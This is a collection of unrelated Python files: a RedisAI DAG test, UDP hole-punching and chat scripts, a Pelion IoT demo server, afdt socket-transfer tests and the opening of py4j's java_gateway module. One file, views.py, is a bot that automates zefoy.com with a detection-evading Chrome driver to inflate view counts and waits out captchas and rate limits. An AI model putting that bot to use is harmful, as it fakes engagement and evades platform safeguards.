'INPUTS', 1, temp_key1,
'OUTPUTS', 1, temp_key2_0,
'|>',
'AI.MODELEXECUTE', model_name_1,
'INPUTS', 1, temp_key1,
'OUTPUTS', 1, temp_key2_1,
'|>',
'AI.SCRIPTEXECUTE', script_name_1, 'ensemble',
'INPUTS', 2, temp_key2_0, temp_key2_1,
'OUTPUTS', 1, temp_key1,
'|>',
'AI.SCRIPTEXECUTE', script_name_0, 'post_process',
'INPUTS', 1, temp_key1,
'OUTPUTS', 1, class_key_0)
# temp_key1 + '_foo' is an input for a DAG op which is not an output of a previous op.
check_error_message(env, con, "INPUT key cannot be found in DAG",
'AI.DAGEXECUTE',
'PERSIST', '1', class_key_0,
'|>',
'AI.TENSORSET', image_key, 'UINT8', img.shape[1], img.shape[0], 3, 'BLOB', img.tobytes(),
'|>',
'AI.SCRIPTEXECUTE', script_name_0, 'pre_process_3ch',
'INPUTS', 1, image_key,
'OUTPUTS', 1, temp_key1,
'|>',
'AI.MODELEXECUTE', model_name_0,
'INPUTS', 1, temp_key1 + '_foo',
'OUTPUTS', 1, temp_key2_0,
'|>',
'AI.MODELEXECUTE', model_name_1,
'INPUTS', 1, temp_key1,
'OUTPUTS', 1, temp_key2_1,
'|>',
'AI.SCRIPTEXECUTE', script_name_1, 'ensemble',
'INPUTS', 2, temp_key2_0, temp_key2_1,
'OUTPUTS', 1, temp_key1,
'|>',
'AI.SCRIPTEXECUTE', script_name_0, 'post_process',
'INPUTS', 1, temp_key1,
'OUTPUTS', 1, class_key_0)
# The 'ensemble' function in script_name_0 expects to receive 2 inputs (not 1)
ret = con.execute_command(
'AI.DAGEXECUTE',
'PERSIST', '1', class_key_0, '|>',
'AI.TENSORSET', image_key, 'UINT8', img.shape[1], img.shape[0], 3, 'BLOB', img.tobytes(),
'|>',
'AI.SCRIPTEXECUTE', script_name_0, 'pre_process_3ch',
'INPUTS', 1, image_key,
'OUTPUTS', 1, temp_key1,
'|>',
'AI.MODELEXECUTE', model_name_0,
'INPUTS', 1, temp_key1,
'OUTPUTS', 1, temp_key2_0,
'|>',
'AI.MODELEXECUTE', model_name_1,
'INPUTS', 1, temp_key1,
'OUTPUTS', 1, temp_key2_1,
'|>',
'AI.SCRIPTEXECUTE', script_name_0, 'ensemble',
'INPUTS', 1, temp_key2_0,
'OUTPUTS', 1, temp_key1,
'|>',
'AI.SCRIPTEXECUTE', script_name_0, 'post_process',
'INPUTS', 1, temp_key1,
'OUTPUTS', 1, class_key_0)
env.assertEqual(b'OK', ret[0])
env.assertEqual(b'OK', ret[1])
env.assertEqual(b'OK', ret[2])
env.assertEqual(b'OK', ret[3])
env.assertEqual(b'NA', ret[5])
env.assertEqual(type(ret[4]), redis.exceptions.ResponseError)
env.assertTrue("list index out of range" in ret[4].__str__())
ret = con.execute_command(
'AI.DAGEXECUTE',
'PERSIST', '1', class_key_0,
'|>',
'AI.TENSORSET', image_key, 'UINT8', img.shape[1], img.shape[0], 3, 'BLOB', img.tobytes(),
'|>',
'AI.SCRIPTEXECUTE', script_name_0, 'pre_process_3ch',
'INPUTS', 1, image_key,
'OUTPUTS', 1, temp_key1,
'|>',
'AI.MODELEXECUTE', model_name_0,
'INPUTS', 1, temp_key1,
'OUTPUTS', 1, temp_key2_0,
'|>',
'AI.MODELEXECUTE', model_name_1,
'INPUTS', 1, temp_key1,
'OUTPUTS', 1, temp_key2_1,
'|>',
'AI.SCRIPTEXECUTE', script_name_0, 'ensemble',
'INPUTS', 2, temp_key2_0, temp_key2_1,
'OUTPUTS', 1, temp_key1,
'|>',
'AI.SCRIPTEXECUTE', script_name_0, 'post_process',
'INPUTS', 1, temp_key1,
'OUTPUTS', 1, class_key_0,
)
env.assertEqual([b'OK', b'OK', b'OK', b'OK', b'OK', b'OK'], ret)
ensureSlaveSynced(con, env)
ret = con.execute_command('AI.TENSORGET', class_key_0, 'VALUES' )
# tf model has 1001 classes [0,1000]
env.assertEqual(ret[0]>=0 and ret[0]<1001, True)
|
views.py
|
import fade
import undetected_chromedriver as uc
from time import sleep
from selenium.webdriver.common.by import By
import os
import io
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import threading
from datetime import datetime
from selenium import webdriver
def time():
global current_time
while True:
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
sleep(0.5)
def main():
global driver
global wait
try:
# selecting views
driver.refresh()
WebDriverWait(driver, 5).until(EC.element_to_be_clickable((By.XPATH, '/html/body/div[4]/div[1]/div[3]/div/div[4]/div/button'))).click()
WebDriverWait(driver, 5).until(EC.element_to_be_clickable((By.XPATH, '/html/body/div[4]/div[5]/div/form/div/input'))).clear() #clearing input
except:
try:
ck = wait.until(EC.element_to_be_clickable((By.XPATH, "/html/body/div[4]/div[1]/div[3]/div/div[4]/div/p/small")))
if ck.text == "soon will be update":
print("[x | "+str(current_time)+"] Unavailable => Views", end="\r")
sleep(999)
captcha_ai()
else:
driver.refresh()
main()
except:
pass
print("[x | "+str(current_time)+"] HUH? ERROR")
sleep(1)
driver.refresh()
sleep(5)
captcha_ai()
try:
print(fade.water('[* | '+str(current_time)+'] Sending URL'), end="\r")
sleep(0.1)
WebDriverWait(driver, 5).until(EC.element_to_be_clickable((By.XPATH, '/html/body/div[4]/div[5]/div/form/div/input'))).send_keys(url)
sleep(0.1)
WebDriverWait(driver, 5).until(EC.element_to_be_clickable((By.XPATH, '/html/body/div[4]/div[5]/div/form/div/div/button'))).click() # searching
try:
tv = WebDriverWait(driver, 5).until(EC.element_to_be_clickable((By.XPATH, "/html/body/div[4]/div[5]/div/div/div[1]/div/form/button"))) #get views num on send button
print(fade.brazil("[- | "+str(current_time)+"] Total views: " + tv.text), end="\r")
WebDriverWait(driver, 5).until(EC.element_to_be_clickable((By.XPATH, '/html/body/div[4]/div[5]/div/div/div[1]/div/form/button'))).click() # send views
except:
sleep(2)
lmt = wait.until(EC.element_to_be_clickable((By.CSS_SELECTOR, "h4")))
timer_message = lmt.text
minutes = int(timer_message.split()[2])
seconds = int(timer_message.split()[4])
time_to_wait = (minutes * 60 + seconds)
print("[* | "+str(current_time)+"] Waiting => ", time_to_wait, 'seconds')
sleep(time_to_wait)
main()
main()
except:
try:
driver.refresh()
sleep(1)
driver.find_element(By.XPATH, '/html/body/div[4]/div[1]/div[3]/div/div[4]/div/button').click()
main()
except:
captcha_ai()
def captcha_ai():
driver.set_window_position(0, 0)
print('[*] Solve Captcha')
sleep(5)
try:
driver.find_element(By.XPATH, '/html/body/div[4]/div[1]/div[3]/div/div[4]/div/button').click()
driver.refresh()
print(fade.random("[* | " + str(current_time) + "] Boyzz, we are in!"), end="\r")
driver.set_window_position(-10000, 0)
main()
except:
captcha_ai()
if __name__ == "__main__":
print(fade.purplepink(r'''
._______.______ ._______._______ .___ .___ ._______ ___ .________ TM
:_ ____/: __ \ : .____/: .____/ | |___ : __|: .____/.___ | || ___/
| _/ | \____|| : _/\ | : _/\ | | || : || : _/\ : | /\| ||___ \
| | | : \ | / \| / \ | : || || / \| |/ : || /
|_. | | |___\|_.: __/|_.: __/ \ || ||_.: __/| / ||__:___/
:/ |___| :/ :/ \____/ |___| :/ |______/|___| :
: :
:
'''))
#start = input('[*] Type any key to start: ')
url = input('[*] Url: ')
opts = webdriver.ChromeOptions()
driver = uc.Chrome(options=opts)
driver.get('https://zefoy.com')
wait = WebDriverWait(driver, 5)
a = threading.Thread(target=time)
b = threading.Thread(target=captcha_ai)
a.start()
b.start()
|
Nodes.py
|
'''
Created on Jul 25, 2017
@author: Steven Proctor
grab +port grab +port
spit packets
receive
'''
import socket
import time
from threading import Thread
class Node(object):
'''
UDP peer that performs a simple NAT hole punch: both sides probe a shared range
of ports, exchange the ports they ended up bound to, then keep one socket for
sending and one for receiving. Datagrams arriving from the peer are appended to
self.buffer by a background listener thread.
'''
def __init__(self, addr, ports,female):
self.buffer = []
self.portlink(addr,ports,female)
def send(self, message):
try:
self.outbound.sendto(message, self.toaddr)
except:
time.sleep(0.01)
self.send(message)
def portlink(self,addr,ports,start):
if start:
while True:
s= socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto("t", (socket.gethostbyname(socket.gethostname()), 5555))
if s.getsockname()[1] in ports:
sock = s
break
else:
s.close()
time.sleep(0.01)
for p in ports:
sock.sendto("t",(addr,p))
time.sleep(0.01)
addr2bind = sock.getsockname()
sock.close()
flower = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
flower.bind(addr2bind)
print "waiting"
data, address = flower.recvfrom(64)
print str(address)
self.toaddr = address
self.fromaddr = (addr,int(data))
flower.close()
time.sleep(5)
temp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
temp.sendto("t", self.fromaddr)
tempaddr = temp.getsockname()
temp.close()
self.inbound = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.inbound.bind(tempaddr)
self.outbound = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.outbound.bind(addr2bind)
self.outbound.connect(self.toaddr)
self.outbound.sendto(str(tempaddr[1]),self.toaddr)
self.open = True
t = Thread(target = self.__listen__)
t.start()
else:
self.outbound = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.outbound.sendto("t", (socket.gethostbyname(socket.gethostname()), 5555))
time.sleep(0.02*len(ports))
while True:
s= socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto("t", (socket.gethostbyname(socket.gethostname()), 5555))
if s.getsockname()[1] in ports:
sock = s
break
else:
s.close()
time.sleep(0.01)
for p in ports:
sock.sendto(str(self.outbound.getsockname()[1]),(addr,p))
time.sleep(0.01)
addr2bind = sock.getsockname()
sock.close()
self.inbound = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.inbound.bind(addr2bind)
print "waiting"
data, address = self.inbound.recvfrom(64)
print "complete"
self.fromaddr = address
self.toaddr = (addr,int(data))
self.outbound.sendto("check",self.toaddr)
self.open = True
t = Thread(target = self.__listen__)
t.start()
def __listen__(self):
while self.open:
data, address = self.inbound.recvfrom(64)
if address == self.fromaddr:
self.buffer.append(data)
ports = range(30000,65000,300)
node = Node("73.172.209.102", ports, False)
while(True):
node.send(str(raw_input("")))
if len(node.buffer) != 0:
print node.buffer[len(node.buffer)-1]
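# Illustrative sketch (not from the original script): the other peer would pass
# True as the third argument so that portlink() takes the 'start' branch, e.g.
#   peer_ports = range(30000, 65000, 300)
#   peer = Node("203.0.113.5", peer_ports, True)   # hypothetical peer address
#   peer.send("hello")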
|
sim-webapp.py
|
#!/usr/bin/env python
#
# Pelion Virtual Demo
# (C) COPYRIGHT 2021 Pelion Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# --------------------------------------------------------------------------
"""Pelion virtual demo bootstrap."""
import logging
import os
import subprocess
import threading
import posix_ipc
import asyncio
import contextlib
import tornado.escape
import tornado.ioloop
import tornado.options
import tornado.web
import tornado.websocket
from tornado.options import define, options
define("port", default=8888, help="run on the given port", type=int)
config = {}
MQUEUE_CMD = "/mqueue-cmd"
MQUEUE_RESP = "/mqueue-resp"
qd_cmd = posix_ipc.MessageQueue(
name=MQUEUE_CMD, flags=posix_ipc.O_CREAT, max_messages=10, max_message_size=256)
qd_resp = posix_ipc.MessageQueue(
name=MQUEUE_RESP, flags=posix_ipc.O_CREAT, max_messages=10, max_message_size=256)
class Application(tornado.web.Application):
def __init__(self):
handlers = [(r"/", MainHandler), (r"/comsock", ComSocketHandler)]
settings = dict(
cookie_secret="__TODO:_GENERATE_YOUR_OWN_RANDOM_VALUE_HERE__",
template_path=os.path.join(os.path.dirname(__file__), "templates"),
static_path=os.path.join(os.path.dirname(__file__), "static"),
xsrf_cookies=True,
)
# disable web logging access
logging.getLogger('tornado.access').disabled = True
# initialize mqueue handler
MqueuHandler()
super().__init__(handlers, **settings)
class MqueuHandler():
def __init__(self):
mqueue_listen_thread = threading.Thread(
target=self.mqueue_resp_listen, daemon=True)
mqueue_listen_thread.start()
    def mqueue_resp_listen(self):
# logging.info("listening on (qd_resp)...")
asyncio.set_event_loop(asyncio.new_event_loop())
while True:
s, _ = qd_resp.receive()
s = s.decode()
# logging.info("got (qd_resp) msg: '%s'", s)
ComSocketHandler.send_update(s)
class MainHandler(tornado.web.RequestHandler):
def get(self):
self.render("index.html", sensor_type=config['sensor_type'])
class ComSocketHandler(tornado.websocket.WebSocketHandler):
waiters = set()
def get_compression_options(self):
# Non-None enables compression with default options.
return {}
def open(self):
# logging.info("open(self)")
ComSocketHandler.waiters.add(self)
def on_close(self):
# logging.info("on_close(self)")
ComSocketHandler.waiters.remove(self)
@classmethod
def send_update(cls, message):
for waiter in cls.waiters:
try:
waiter.write_message(message)
except:
logging.error("Error sending message", exc_info=True)
# logging.info("sent (ws) msg to %d waiters", len(cls.waiters))
def on_message(self, message):
# logging.info("got (ws) msg: %r", message)
# add null termination expected from C backend
cmd = message.encode('ascii') + b'\x00'
qd_cmd.send(cmd)
# logging.info("sent (qd_cmd) msg: '%s'", cmd)
def gencerts():
# invoke Pelion 'dev_init.py' to create certs
subprocess.Popen(['./dev_init.py', 'with-credentials', '-a', config["api_key"],
'-u', config['cloud_url']],
cwd='/build/mbed-cloud-client-example/utils').wait()
def build():
# delete the last instance of the app so that we don't automatically
# execute the old app if the new build fails
with contextlib.suppress(FileNotFoundError):
os.remove(
'/build/mbed-cloud-client-example/__x86_x64_NativeLinux_mbedtls/Debug/mbedCloudClientExample.elf')
# spawn process to build pelion-client
subprocess.Popen(['make', 'mbedCloudClientExample.elf'],
cwd='/build/mbed-cloud-client-example/__x86_x64_NativeLinux_mbedtls').wait()
def _main():
tornado.options.parse_command_line()
# check if CLOUD_SDK_API_KEY env is configured
try:
config["api_key"] = os.environ['CLOUD_SDK_API_KEY']
    except KeyError:
        logging.error(
            'Missing CLOUD_SDK_API_KEY environment variable!'
        )
exit(1)
# check if CLOUD_URL env is configured (default to prod.)
config['cloud_url'] = os.getenv('CLOUD_URL', 'https://api.us-east-1.mbedcloud.com')
# check if SENSOR env is configured
config['sensor_type'] = os.getenv('SENSOR', 'vibration')
    if config['sensor_type'] not in ("vibration", "temperature", "counter"):
logging.error(
"unknown sensor type configured, please use either 'vibration', 'temperature' or 'counter'\n"
)
exit(1)
# check if we need to generate certs
if not os.path.isfile('certexists'):
# generate dev and fw certs
gencerts()
# raise flag so that we don't regenerate on next run
open('certexists', 'w').close()
# check if we need to build app
if not os.path.isfile('firstrun'):
# build application
build()
# raise flag so that we don't rebuild on next run
open('firstrun', 'w').close()
# launch pelion client in a separate process
subprocess.Popen(['./mbedCloudClientExample.elf'],
cwd='/build/mbed-cloud-client-example/__x86_x64_NativeLinux_mbedtls/Debug/')
# launch web app
app = Application()
app.listen(options.port)
tornado.ioloop.IOLoop.current().start()
if __name__ == "__main__":
_main()
|
socketTest.py
|
from socket import *
from time import sleep
import threading
def recvData():
udpRecvSocket = socket(AF_INET,SOCK_DGRAM)
myRecvPort = 48969
bindAddr = ('',myRecvPort)
try:
udpRecvSocket.bind(bindAddr)
except OSError:
myRecvPort = int(input("input a port:"))
bindAddr = ('',myRecvPort)
udpRecvSocket.bind(bindAddr)
    myIpAddr = gethostbyname(getfqdn(gethostname()))  # gethostname() returns the host name; gethostbyname() resolves it to the host IP
print("local ip:[{}],local port [{}]".format(myIpAddr,myRecvPort))
while True:
try:
recvData = udpRecvSocket.recvfrom(1024)
print("receive data is :{}".format(recvData))
except error as e:
print(e)
def sendData():
sleep(10)
udpSendSocket = socket(AF_INET,SOCK_DGRAM)
sendIpAddr = input("target ip:")
sendPort = int(input("target port:"))
sendAddr = (sendIpAddr,sendPort)
while True:
sendData = input("please input the data to sended")
udpSendSocket.sendto(sendData.encode(),sendAddr)
def main():
t1 = threading.Thread(target = recvData)
t2 = threading.Thread(target = sendData)
t1.start()
t2.start()
t1.join()
t2.join()
if __name__ == '__main__':
main()
|
runtests.py
|
#!/usr/bin/env python
import sys
import contextlib
import traceback
import unittest
import time
import os
import subprocess
import errno
import signal
import urllib2
import threading
import Queue
PREFIX = os.environ.get("AFDT_TEST_PREFIX", "").split()
class SubprocessTestCase(unittest.TestCase):
def setUp(self):
def sigchld_handler(signum, frame):
while True:
status = os.waitpid(-1, os.WNOHANG | os.WUNTRACED | os.WCONTINUED)
if status == (0, 0):
break
if os.WIFSTOPPED(status[1]) or os.WIFCONTINUED(status[1]):
# Ignore SIGCHLDs due to stopping and starting a child
continue
raise Exception("child died unexpectedly: %r" % (status,))
signal.signal(signal.SIGCHLD, sigchld_handler)
def killChildren(self, children):
signal.signal(signal.SIGCHLD, signal.SIG_DFL)
for proc in children:
try:
if proc is not None:
os.kill(proc.pid, signal.SIGTERM)
except OSError, err:
if err.errno != errno.ESRCH:
traceback.print_exc()
class EvhttpTest(SubprocessTestCase):
prod_port = 8080
port0 = 9090
port1 = 9191
# Number of requests to send to the production port to verify
# the set of servers that are listening on it.
# This is nondeterministic, but we take our chances.
iterations = 0x10000
def setUp(self):
SubprocessTestCase.setUp(self)
def startserver(port):
return subprocess.Popen(PREFIX +
["./server", "-a", str(port), "-s", "p" + str(port)])
self.proc0 = None
self.proc1 = None
self.proc0 = startserver(self.port0)
self.proc1 = startserver(self.port1)
# TODO(dreiss): Check statuses so we can stop sleeping early
time.sleep(1.0/2)
status = os.waitpid(-1, os.WNOHANG)
assert status == (0, 0)
def tearDown(self):
self.killChildren([self.proc0, self.proc1])
def testServers(self):
def openurl(port, path):
with contextlib.closing(urllib2.urlopen(
"http://localhost:%d/%s" % (port, path))) as handle:
return handle.read()
def checkret(port, path, content):
self.assertEqual(openurl(port, path), content)
def putret(port, path, q):
q.put(openurl(port, path))
def checkset(port, path, expect):
results = set()
iter = 0
while iter < self.iterations:
results.add(openurl(port, path))
self.assert_(results <= expect)
if results == expect:
break
iter += 1
self.assertNotEqual(iter, self.iterations)
# Check basic status responses
checkret(self.port0, "status", "p%d" % self.port0)
checkret(self.port1, "status", "p%d" % self.port1)
# Have one server bind to production
checkret(self.port0, "bind_prod", "bind")
# Verify production
checkret(self.prod_port, "status", "p%d" % self.port0)
# Rebind detection
checkret(self.port0, "bind_prod", "already_open")
# Close production
checkret(self.port0, "close_prod", "closed")
# Verify close production
checkret(self.port0, "close_prod", "no_prod")
# Repeat with the other server
checkret(self.port1, "bind_prod", "bind")
checkret(self.prod_port, "status", "p%d" % self.port1)
checkret(self.port1, "bind_prod", "already_open")
checkret(self.port1, "close_prod", "closed")
checkret(self.port1, "close_prod", "no_prod")
# Have one server bind to production
checkret(self.port0, "bind_prod", "bind")
# Verify production
checkret(self.prod_port, "status", "p%d" % self.port0)
# Have the other server grab the socket
checkret(self.port1, "bind_prod", "afdt")
# Verify that both are listening
checkset(self.prod_port, "status",
set(["p%d" % port for port in [self.port0, self.port1]]))
# Close the socket on the original server
checkret(self.port0, "close_prod", "closed")
# Verify that only the second is listening
checkset(self.prod_port, "status",
set(["p%d" % port for port in [self.port1]]))
# Have the first server get the socket back
checkret(self.port0, "bind_prod", "afdt")
# Verify that both are listening
checkset(self.prod_port, "status",
set(["p%d" % port for port in [self.port0, self.port1]]))
# Close the socket on the second server
checkret(self.port1, "close_prod", "closed")
# Verify that only the first is listening
checkset(self.prod_port, "status",
set(["p%d" % port for port in [self.port0]]))
# Close the socket on the first server
checkret(self.port0, "close_prod", "closed")
# Repeat the simple case with the second server
checkret(self.port1, "bind_prod", "bind")
checkret(self.prod_port, "status", "p%d" % self.port1)
checkret(self.port1, "bind_prod", "already_open")
checkret(self.port1, "close_prod", "closed")
checkret(self.port1, "close_prod", "no_prod")
# Have the first server bind to production
checkret(self.port0, "bind_prod", "bind")
# Verify production
checkret(self.prod_port, "status", "p%d" % self.port0)
# Suspend that process
self.proc0.send_signal(signal.SIGSTOP)
# Use a background thread to have the second server grab the socket
q = Queue.Queue()
t = threading.Thread(target=putret, args=(self.port1, "bind_prod", q))
t.start()
# After a half second, we should still be waiting
time.sleep(0.5)
self.assert_(q.empty())
# The second server should still be able to respond to requests
checkret(self.port1, "status", "p%d" % self.port1)
# Let the first server wake up and transfer the socket
self.proc0.send_signal(signal.SIGCONT)
# The second server should receive the socket quickly
self.assertEqual(q.get(timeout=1.0/16), "afdt")
t.join(1.0/16)
self.assertFalse(t.isAlive())
# Close the socket on the first server
checkret(self.port0, "close_prod", "closed")
# Verify that the second is listening
checkret(self.prod_port, "status", "p%d" % self.port1)
# Remove the signal handler
signal.signal(signal.SIGCHLD, signal.SIG_DFL)
# Shut both servers down
checkret(self.port0, "shutdown", "shutting_down")
checkret(self.port1, "shutdown", "shutting_down")
# Make sure they both go down in a reasonable time
def sigalrm_handler(signum, frame):
raise Exception("waitpid timed out")
signal.signal(signal.SIGALRM, sigalrm_handler)
signal.alarm(1)
self.assertEqual(self.proc0.wait(), 0)
self.assertEqual(self.proc1.wait(), 0)
self.proc0 = None
self.proc1 = None
signal.alarm(0)
signal.signal(signal.SIGALRM, signal.SIG_DFL)
class CatterTest(SubprocessTestCase):
svport = 9090
client = "catter"
def setUp(self):
SubprocessTestCase.setUp(self)
def tearDown(self):
self.killChildren([self.svproc, self.clproc])
def testCatter(self):
self.svproc = None
self.clproc = None
self.svproc = subprocess.Popen(PREFIX +
["./catter", "-s"], stdout=subprocess.PIPE)
time.sleep(1.0/4)
self.clproc = subprocess.Popen(PREFIX +
["./" + self.client], stdin=subprocess.PIPE)
time.sleep(1.0/4)
self.clproc.stdin.write("TEST1")
time.sleep(1.0/4)
# Remove the signal handler
signal.signal(signal.SIGCHLD, signal.SIG_DFL)
# Let the server exit
time.sleep(1.0/2)
self.clproc.stdin.write("TEST2")
self.clproc.stdin.close()
time.sleep(1.0/4)
self.assertEqual(self.svproc.stdout.read(), "TEST1TEST2")
# Make sure they both go down in a reasonable time
# TODO(dreiss): Factor out subprocs?
def sigalrm_handler(signum, frame):
raise Exception("waitpid timed out")
signal.signal(signal.SIGALRM, sigalrm_handler)
signal.alarm(1)
self.assertEqual(self.svproc.wait(), 0)
self.assertEqual(self.clproc.wait(), 0)
self.svproc = None
self.clproc = None
signal.alarm(0)
signal.signal(signal.SIGALRM, signal.SIG_DFL)
class SyncCatterTest(CatterTest):
client = "sync_catter"
# The evhttp test relies on some really new features of libevent,
# so allow it to be disabled independently.
if os.environ.get("NO_HTTP_TEST", False):
del EvhttpTest
if __name__ == "__main__":
unittest.main()
|
java_gateway.py
|
# -*- coding: UTF-8 -*-
"""Module to interact with objects in a Java Virtual Machine from a
Python Virtual Machine.
Variables that might clash with the JVM start with an underscore
(Java naming conventions discourage leading underscores, so clashes
are unlikely).
Created on Dec 3, 2009
:author: Barthelemy Dagenais
"""
from __future__ import unicode_literals, absolute_import
from collections import deque
import logging
import os
from pydoc import pager
import select
import socket
import struct
from subprocess import Popen, PIPE
import subprocess
import sys
import traceback
from threading import Thread, RLock
import weakref
from py4j.compat import (
range, hasattr2, basestring, CompatThread, Queue, WeakSet)
from py4j.finalizer import ThreadSafeFinalizer
from py4j import protocol as proto
from py4j.protocol import (
Py4JError, Py4JJavaError, Py4JNetworkError,
Py4JAuthenticationError,
get_command_part, get_return_value,
register_output_converter, smart_decode, escape_new_line,
is_fatal_error, is_error, unescape_new_line,
get_error_message, compute_exception_message)
from py4j.signals import Signal
from py4j.version import __version__
class NullHandler(logging.Handler):
def emit(self, record):
pass
null_handler = NullHandler()
logging.getLogger("py4j").addHandler(null_handler)
logger = logging.getLogger("py4j.java_gateway")
BUFFER_SIZE = 4096
DEFAULT_ADDRESS = "127.0.0.1"
DEFAULT_PORT = 25333
DEFAULT_PYTHON_PROXY_PORT = 25334
DEFAULT_ACCEPT_TIMEOUT_PLACEHOLDER = "DEFAULT"
DEFAULT_CALLBACK_SERVER_ACCEPT_TIMEOUT = 5
PY4J_SKIP_COLLECTIONS = "PY4J_SKIP_COLLECTIONS"
PY4J_TRUE = set(["yes", "y", "t", "true"])
server_connection_stopped = Signal()
"""Signal sent when a Python (Callback) Server connection is stopped.
Will supply the ``connection`` argument, an instance of CallbackConnection.
The sender is the CallbackServer instance.
"""
server_connection_started = Signal()
"""Signal sent when a Python (Callback) Server connection is started.
Will supply the ``connection`` argument, an instance of CallbackConnection.
The sender is the CallbackServer instance.
"""
server_connection_error = Signal()
"""Signal sent when a Python (Callback) Server encounters an error while
waiting for a connection.
Will supply the ``error`` argument, an instance of Exception.
The sender is the CallbackServer instance.
"""
server_started = Signal()
"""Signal sent when a Python (Callback) Server is started
Will supply the ``server`` argument, an instance of CallbackServer
The sender is the CallbackServer instance.
"""
server_stopped = Signal()
"""Signal sent when a Python (Callback) Server is stopped
Will supply the ``server`` argument, an instance of CallbackServer
The sender is the CallbackServer instance.
"""
pre_server_shutdown = Signal()
"""Signal sent when a Python (Callback) Server is about to shut down.
Will supply the ``server`` argument, an instance of CallbackServer
The sender is the CallbackServer instance.
"""
post_server_shutdown = Signal()
"""Signal sent when a Python (Callback) Server is shutted down.
Will supply the ``server`` argument, an instance of CallbackServer
The sender is the CallbackServer instance.
"""
def get_create_new_process_group_kwargs():
"""Ensures that the child process is created in another process group.
This prevents signals such as SIGINT from propagating to the JVM.
"""
if os.name != "nt":
kwargs = {"preexec_fn": os.setpgrp}
else:
kwargs = {"creationflags": subprocess.CREATE_NEW_PROCESS_GROUP}
return kwargs
def set_reuse_address(server_socket):
"""Sets reuse address option if not on windows.
On windows, the SO_REUSEADDR option means that multiple server sockets can
be bound to the same address (it has nothing to do with TIME_WAIT).
"""
if os.name != "nt":
server_socket.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
def set_default_callback_accept_timeout(accept_timeout):
"""Sets default accept timeout of callback server.
"""
deprecated("set_default_callback_accept_timeout", "1.0",
"CallbackServerParameters")
global DEFAULT_CALLBACK_SERVER_ACCEPT_TIMEOUT
DEFAULT_CALLBACK_SERVER_ACCEPT_TIMEOUT = accept_timeout
def deprecated(name, last_version, use_instead="", level=logging.DEBUG,
raise_exc=False):
if not use_instead:
msg = "{0} is deprecated and will be removed in version {1}"\
.format(name, last_version)
else:
msg = "{0} is deprecated and will be removed in version {1}. "\
"Use {2} instead."\
.format(name, last_version, use_instead)
logger.log(level, msg)
if raise_exc:
raise DeprecationWarning(msg)
def java_import(jvm_view, import_str):
"""Imports the package or class specified by `import_str` in the
jvm view namespace.
:param jvm_view: The jvm_view in which to import a class/package.
    :param import_str: The class (e.g., java.util.List) or the package
        (e.g., java.io.*) to import
"""
gateway_client = jvm_view._gateway_client
command = proto.JVMVIEW_COMMAND_NAME + proto.JVM_IMPORT_SUB_COMMAND_NAME +\
jvm_view._id + "\n" + escape_new_line(import_str) + "\n" +\
proto.END_COMMAND_PART
answer = gateway_client.send_command(command)
return_value = get_return_value(answer, gateway_client, None, None)
return return_value
def find_jar_path():
"""Tries to find the path where the py4j jar is located.
"""
paths = []
jar_file = "py4j{0}.jar".format(__version__)
maven_jar_file = "py4j-{0}.jar".format(__version__)
paths.append(jar_file)
# ant
paths.append(os.path.join(os.path.dirname(
os.path.realpath(__file__)), "../../../py4j-java/" + jar_file))
# maven
paths.append(os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"../../../py4j-java/target/" + maven_jar_file))
paths.append(os.path.join(os.path.dirname(
os.path.realpath(__file__)), "../share/py4j/" + jar_file))
paths.append("../../../current-release/" + jar_file)
paths.append(os.path.join(sys.prefix, "share/py4j/" + jar_file))
    # pip install py4j # On Ubuntu 16.04, where virtualenvpath=/usr/local
# this file is here:
# virtualenvpath/lib/pythonX/dist-packages/py4j/java_gateway.py
# the jar file is here: virtualenvpath/share/py4j/py4j.jar
    # pip install --user py4j # On Ubuntu 16.04, where virtualenvpath=~/.local
# this file is here:
# virtualenvpath/lib/pythonX/site-packages/py4j/java_gateway.py
# the jar file is here: virtualenvpath/share/py4j/py4j.jar
paths.append(os.path.join(os.path.dirname(
os.path.realpath(__file__)), "../../../../share/py4j/" + jar_file))
for path in paths:
if os.path.exists(path):
return path
return ""
def launch_gateway(port=0, jarpath="", classpath="", javaopts=[],
die_on_exit=False, redirect_stdout=None,
redirect_stderr=None, daemonize_redirect=True,
java_path="java", create_new_process_group=False,
enable_auth=False):
"""Launch a `Gateway` in a new Java process.
The redirect parameters accept file-like objects, Queue, or deque. When
text lines are sent to the stdout or stderr of the child JVM, these lines
are redirected to the file-like object (``write(line)``), the Queue
(``put(line)``), or the deque (``appendleft(line)``).
The text line will contain a newline character.
Only text output is accepted on stdout and stderr. If you wish to
communicate with the child JVM through bytes, you need to create your own
helper function.
:param port: the port to launch the Java Gateway on. If no port is
specified then an ephemeral port is used.
:param jarpath: the path to the Py4J jar. Only necessary if the jar
was installed at a non-standard location or if Python is using
a different `sys.prefix` than the one that Py4J was installed
under.
:param classpath: the classpath used to launch the Java Gateway.
:param javaopts: an array of extra options to pass to Java (the classpath
should be specified using the `classpath` parameter, not `javaopts`.)
:param die_on_exit: if `True`, the Java gateway process will die when
this Python process exits or is killed.
:param redirect_stdout: where to redirect the JVM stdout. If None (default)
stdout is redirected to os.devnull. Otherwise accepts a
file descriptor, a queue, or a deque. Will send one line at a time
to these objects.
    :param redirect_stderr: where to redirect the JVM stderr. If None (default)
stderr is redirected to os.devnull. Otherwise accepts a
file descriptor, a queue, or a deque. Will send one line at a time to
these objects.
:param daemonize_redirect: if True, the consumer threads will be daemonized
and will not prevent the main Python process from exiting. This means
the file descriptors (stderr, stdout, redirect_stderr, redirect_stdout)
